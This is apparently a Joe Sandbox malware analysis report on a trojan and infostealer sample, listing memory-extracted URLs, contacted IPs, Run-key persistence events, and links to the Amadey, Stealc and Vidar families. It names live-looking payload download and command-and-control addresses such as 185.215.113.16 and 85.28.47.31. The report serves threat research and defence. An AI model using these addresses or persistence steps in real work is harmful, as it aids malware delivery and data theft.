https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/stealc/random.exe395d7f	explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://i.pki.goog/r1.crt0	firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.motherjones.com/politics/2024/07/joe-biden-climate-legacy-donald-trump-kamala-harris/?ut	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://eat.hungryroot.com/hungryroot-reset?utm_medium=paid	firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-c	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorp	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/wr2.crt0	firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://MD8.mozilla.org/1/m	firefox.exe, 00000021.00000003.3158551690.0000016DE975F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bbc.co.uk/	firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugzilla.mo	firefox.exe, 00000021.00000003.3199884339.0000016DEE272000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202097868.0000016DEE20F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://shavar.services.mozilla.com/	firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.ie/	firefox.exe, 00000021.00000003.3216728852.0000016DE495F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ebay.at/sch/	firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spocs.getpocket.com/	firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.com/sch/	firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8C4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://i.natgeofe.com/n/aa2728ac-4a75-4b3e-9163-2b32a66e9d1d/MM100710_230501_00795_16x9.JPG?w=1200	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.iqiyi.com/	firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0d	firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.	firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org	firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr1/gsr1.crl0;	firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/cost/random.exe7	explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/2f642ebf-706d-4eac-8c53-46182	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d1n0c1ufntxbvh.cloudfront.net/photo/eabcdc61/98254/1200x/	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/002	explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://account.bellmedia.c	firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://85.28.47.31gl&(	48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/tools/feedback/chat_load.js	firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://csp.withgoogle.com/csp/report-to/AccountsSignInUi	firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.nl/sch/	firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/r/r1.crl0	firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/inapp/	firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpx=$	axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://apis.google.com	firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.at/	firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://identity.mozilla.com/apps/relay	firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210723597.0000016DEA8E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://images.fastcompany.com/image/upload/f_auto	firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba2700	firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://screenshots.firefox.com/	firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.wykop.pl/	firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/f9b342d5-c87b-4c3e-a8c4-0609f	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ebay.com.au/	firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.php003002	explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
143.204.9.50	mitmdetection.services.mozilla.com	United States	16509	AMAZON-02US	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.80.110	unknown	United States	15169	GOOGLEUS	false
34.120.237.76	img-prod.pocket.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
85.28.47.31	unknown	Russian Federation	31643	GES-ASRU	true
142.251.40.206	unknown	United States	15169	GOOGLEUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.142	play.google.com	United States	15169	GOOGLEUS	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
172.217.16.142	unknown	United States	15169	GOOGLEUS	false
34.117.121.53	attachments.prod.remote-settings.prod.webservices.mozgcp.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
34.120.5.221	prod.pocket.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
172.217.18.4	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
172.253.62.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
23.96.180.189	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.18.14	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
34.149.97.1	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
172.217.23.110	unknown	United States	15169	GOOGLEUS	false
142.250.181.238	unknown	United States	15169	GOOGLEUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.251.32.100	unknown	United States	15169	GOOGLEUS	false
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
142.250.65.195	unknown	United States	15169	GOOGLEUS	false
172.217.16.206	unknown	United States	15169	GOOGLEUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.251.40.238	unknown	United States	15169	GOOGLEUS	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
18.65.39.112	services.addons.mozilla.org	United States	3	MIT-GATEWAYSUS	false
142.251.40.163	unknown	United States	15169	GOOGLEUS	false
142.250.186.164	unknown	United States	15169	GOOGLEUS	false
34.36.165.17	tiles-cdn.prod.ads.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483195
Start date and time:	2024-07-26 20:08:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@141/390@137/41
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 62% Number of executed functions: 83 Number of non-executed functions: 210
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 20.189.173.22, 142.250.185.227, 142.250.185.78, 74.125.71.84, 52.168.117.173, 34.104.35.123, 13.107.42.16, 204.79.197.239, 13.107.21.239, 142.250.185.238, 13.107.6.158, 2.19.126.145, 2.19.126.152, 66.102.1.84, 64.233.167.84, 2.23.209.182, 2.23.209.133, 2.23.209.130, 2.23.209.179, 2.23.209.185, 2.23.209.149, 2.23.209.176, 2.23.209.148, 2.23.209.189, 142.250.186.163, 142.250.186.99, 93.184.221.240, 142.250.185.170, 142.250.185.106, 216.58.206.74, 142.250.186.170, 142.250.184.234, 172.217.16.138, 142.250.186.106, 172.217.18.10, 142.250.186.42, 142.250.185.202, 142.250.185.138, 216.58.206.42, 142.250.185.234, 142.250.184.202, 142.250.181.234, 172.217.16.202, 142.250.185.99, 20.42.65.92, 216.58.212.138, 142.250.186.74, 142.250.74.202, 172.217.23.106, 142.250.185.74, 142.250.186.138, 142.250.186.35, 172.217.18.3, 50.112.139.120, 52.36.33.58, 44.238.205.197, 54.210.173.221, 54.161.16.42, 35.173.108.201, 95.101.54.107, 95.101.54.131, 34.120.15
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, img-getpocket-cdn.prod.mozaws.net, slscr.update.microsoft.com, a416.dscd.akamai.net, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, www.bing.com, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, content-autofill.googleapis.com, tracking-protection.prod.mozaws.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, getpocket-cdn.prod.mozaws.net, clients.l.google.com, location.services.mozilla.com, tracking-protection.cdn.mozilla.net, download.mozilla.org, ciscobinary.openh264.org, config.edge.skype.com.traffi
Execution Graph export aborted for target RoamingCBFCFBFBFB.exe, PID 7440 because it is empty
Execution Graph export aborted for target RoamingIJDGCAEBFI.exe, PID 7624 because it is empty
Execution Graph export aborted for target axplong.exe, PID 7780 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:09:39	API Interceptor	2x Sleep call for process: WerFault.exe modified
14:10:01	API Interceptor	1105x Sleep call for process: explorti.exe modified
14:10:01	API Interceptor	1109x Sleep call for process: axplong.exe modified
14:10:53	API Interceptor	1x Sleep call for process: firefox.exe modified
20:09:21	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
20:09:24	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
20:10:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe
20:10:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe C:\Users\user\1000003002\ee7a49fbf0.exe
20:10:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe
20:10:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe C:\Users\user\1000003002\ee7a49fbf0.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
143.204.9.50	https://app.moqups.com/ZLiTyUzF7Uf1aLCrZXPQ9axMsmecKXD0/view/page/a94821596	Get hash	malicious	HTMLPhisher	Browse
143.204.9.50	https://protect-us.mimecast.com/s/35hAClYVKPI1zLDkC4_E-B?domain=urldefense.proofpoint.com	Get hash	malicious	HTMLPhisher	Browse
162.159.61.3	file.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	reference usfinancegl@ey.com - Search.pdf	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	Fire Safety Partnership.pdf	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	Babadeda	Browse
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
85.28.47.31	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	joom.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	CqFFuklrhj.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	Jzu7V2qdJx.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://disney.apexanalytix.com/Help/DownloadFile?ID=P%2fgMga3n7lQ%3d	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	file.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
example.org	file.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
	file.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
	file.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
